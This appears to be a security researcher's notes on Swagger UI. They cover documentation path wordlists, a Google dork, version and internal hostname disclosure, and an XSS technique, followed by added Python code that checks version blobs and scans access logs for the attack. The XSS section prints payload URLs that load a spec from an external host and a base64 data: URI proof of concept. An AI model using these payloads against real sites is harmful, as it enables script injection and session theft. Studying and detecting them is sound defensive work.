SwaggerUI

Swagger UI renders interactive API documentation so that a user can more easily understand the inner functions of an API. That is not bad in itself, but it can reveal sensitive information: an attacker who can read the documentation sees every endpoint and function, which makes the API easier to exploit. One could, for instance, find an endpoint documented as returning all users on a GET request to /api/B47DahG539DdY32A/users, and it may expose those users completely unauthenticated if the application does not check for authentication. Looking at the Snyk vulnerability listing for Swagger UI, one sees that all Swagger UI versions up to and including 4.1.2 are reported as vulnerable.

Directories

When researching this, it seemed like there isn't any "exact" default path for the documentation; it may differ on every application. The list below contains a few I've encountered, which are also included in my swagger.txt wordlist:

/swagger/index.html
/swagger/index.jsp
/v2/swagger.json
/swagger.yaml
/swagger
/api
/api/doc
/docs
/docs/index.php
/swagger-ui.html

The path can also be renamed to something else, but it usually still sits under an /api/ directory:

/api/renamed/swagger

Google Dorking/Hacking

This dork will find Swagger UI instances indexed by Google. Change example.com to the target website:

intext:"Swagger UI" intitle:"Swagger UI" site:example.com

Swagger UI Version Check and Internal Hostname

What I discovered on an application is that, if successful, a potential internal hostname is disclosed. This came from the JS file /swagger-ui/swagger-ui-bundle.js, which was called upon because the Swagger UI component was loaded, with the payload below (see this GitHub issue for info):

JSON.stringify(versions)

Here is an internal hostname; because it is an old web server, it exposes the internal IPv4 address, since the developers named it like this (it was not uncommon to name the internal hostname after the local IPv4 address "back in the olden days"):

[Image: Swagger version and hostname]

If you notice that multiple Swagger instances report the same hostname, the admin may have used a Docker image, and the instance therefore most likely shares its internal hostname with everyone else using the same image.
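To turn the console output of JSON.stringify(versions) into a repeatable check, here is an added Python example (my code, not from the page or the Swagger UI project). It assumes the `versions` object has the shape shown in the constructed sample below, with a `swaggerUi` entry carrying `version` and build metadata; the `machine` value in the sample is a placeholder, and the version threshold is the 4.1.2 figure the page cites. Treat `machine` as build metadata: it is recorded when the bundle is compiled, which is why identical bundles report identical hostnames, as the Docker note above suggests.

```python
"""Assess the `versions` object that swagger-ui-bundle.js exposes.

Added example, not code from the page or from the Swagger UI project. It
assumes the `versions` blob has the shape shown in SAMPLE_VERSIONS_JSON
(a `swaggerUi` entry carrying `version` and build metadata); the sample
itself is constructed and the `machine` value is a placeholder.
"""
import json
import re

# The page states that Swagger UI is vulnerable up to and including 4.1.2,
# so any build at or below this is reported as outdated.
LAST_VULNERABLE = (4, 1, 2)

# Constructed stand-in for what JSON.stringify(versions) prints in the console.
SAMPLE_VERSIONS_JSON = json.dumps({
    "swaggerUi": {
        "version": "3.52.5",
        "gitRevision": "g0000000",
        "gitDirty": False,
        "buildTimestamp": "Mon, 01 Jan 2024 00:00:00 GMT",
        "machine": "example-build-host",  # placeholder, not a real hostname
    }
})


def parse_version(text):
    """Turn '4.1.2' or 'v4.1.2-rc1' into a tuple of ints for safe comparison
    (plain string comparison would rank '10.0.0' below '4.1.2')."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in m.groups())


def assess_versions_blob(blob):
    """Return the detected version, whether it is at or below the last
    vulnerable release, and the build hostname the blob exposes."""
    ui = json.loads(blob).get("swaggerUi") or {}
    version = parse_version(ui.get("version", ""))
    return {
        "version": ".".join(str(p) for p in version),
        "outdated": version <= LAST_VULNERABLE,
        "build_machine": ui.get("machine"),
    }


if __name__ == "__main__":
    print(assess_versions_blob(SAMPLE_VERSIONS_JSON))
```

Paste the console output of JSON.stringify(versions) from your own deployment into assess_versions_blob; an `outdated` result of True means the bundle should be upgraded, and a non-empty `build_machine` tells you what the bundle is leaking regardless of version.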

Potential CMS fingerprinting

When researching where the above values came from, I noted these two URL paths on two different websites (same customer). Take note specifically of the nelmioapidoc and apiplatform values. When googling them, Symfony CMS comes up, so this may be a way to fingerprint Symfony (needs more research):

/bundles/nelmioapidoc/swagger-ui/swagger-ui-bundle.js
/bundles/apiplatform/swagger-ui/swagger-ui-bundle.js

This "disclosure" may not be present on every Swagger UI documentation; the JS files need more research. But as of now I have seen it on a couple of Swagger documentations and it "seems" to be there by default!

XSS

Sometimes there are risks in having Swagger UI. Here are some ways to exploit an XSS! By appending one of the following parameters, pointing at an externally hosted YAML or JSON file, to the Swagger UI URL, it is possible to perform an XSS:

?configUrl=https://jumpy-floor.surge.sh/test.json
?url=https://jumpy-floor.surge.sh/test.yaml

[Image: Swagger XSS]

HackerOne link PoC

?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
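Both forms above leave a clear trace in web server logs: a request for the documentation path whose url or configUrl parameter points somewhere other than the application itself (the base64 PoC decodes to a small JSON document whose url field points at a remote spec). The following is an added Python detector, my code rather than anything from the page or the Swagger UI project; the access-log lines are constructed in combined-log format, and api.example.org and attacker.example are placeholder hostnames. It decodes data: URIs so the nested url is reported too. On the mitigation side, upgrading past the 4.1.2 release the page cites and leaving Swagger UI's queryConfigEnabled option off stops the query string from overriding the spec location in the first place.

```python
"""Flag Swagger UI requests whose url/configUrl parameter loads a spec from
somewhere other than the application itself.

Added example, not code from the page or from the Swagger UI project. The
access-log lines are constructed in combined-log format, and every
hostname (api.example.org, attacker.example) is a placeholder.
"""
import base64
import json
import re
from urllib.parse import unquote, urlsplit

# Query parameters the page shows being abused to point Swagger UI at a
# foreign spec or config document.
WATCHED_PARAMS = ("url", "configUrl")

# Path prefixes under which the documentation is typically served (taken
# from the directory list above).
SWAGGER_PATH_PREFIXES = ("/swagger", "/docs", "/api/doc", "/v2/swagger.json")

# Enough of the combined-log format to recover the request target.
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A data: URI carrying a JSON config whose url field points off-site, built
# here so the constructed sample stays consistent with the decoder below.
DATA_URI_CONFIG = "data:text/html;base64," + base64.b64encode(
    json.dumps({"url": "https://attacker.example/test.yaml"}).encode()
).decode()

SAMPLE_LOGS = "\n".join([
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /swagger-ui.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /swagger-ui.html?url=/v2/swagger.json HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /swagger-ui.html?url=https://attacker.example/test.yaml HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /docs?configUrl={DATA_URI_CONFIG} HTTP/1.1" 200 5120',
])


def decode_data_uri(value):
    """Return the `url` field of a data: URI config (base64 or plain), or
    None if it does not decode to a JSON object."""
    header, _, payload = value.partition(",")
    try:
        raw = base64.b64decode(payload).decode("utf-8", "replace") if ";base64" in header else payload
        parsed = json.loads(raw)
    except (ValueError, TypeError):
        return None
    return parsed.get("url") if isinstance(parsed, dict) else None


def classify_spec_ref(value, own_host):
    """Classify a url/configUrl value as 'local', 'remote' or 'data', together
    with the location it ultimately points to."""
    value = unquote(value)
    if value.lower().startswith("data:"):
        return "data", decode_data_uri(value)
    parts = urlsplit(value)
    foreign_host = bool(parts.netloc) and parts.netloc.lower() != own_host.lower()
    # Anything with a non-HTTP scheme (javascript:, etc.) is not a local spec.
    if parts.scheme not in ("", "http", "https") or foreign_host:
        return "remote", value
    return "local", value


def parse_query(query):
    """Split a raw query string without turning '+' into spaces, so base64
    payloads survive intact (parse_qs would mangle them)."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, val = chunk.partition("=")
            pairs.append((unquote(name), val))
    return pairs


def scan_access_log(text, own_host, path_prefixes=SWAGGER_PATH_PREFIXES):
    """Return one finding per watched parameter that does not resolve to
    the application's own host."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.startswith(path_prefixes):
            continue
        for name, val in parse_query(query):
            if name in WATCHED_PARAMS:
                kind, target = classify_spec_ref(val, own_host)
                if kind != "local":
                    findings.append({"param": name, "kind": kind,
                                     "points_to": target, "client": line.split()[0]})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOGS, "api.example.org"):
        print(finding)
```

Against the constructed sample this reports two findings, both from the second client: the url pointing at attacker.example and the data: URI whose embedded config points at the same host, while the request that loads /v2/swagger.json from the application itself is left alone.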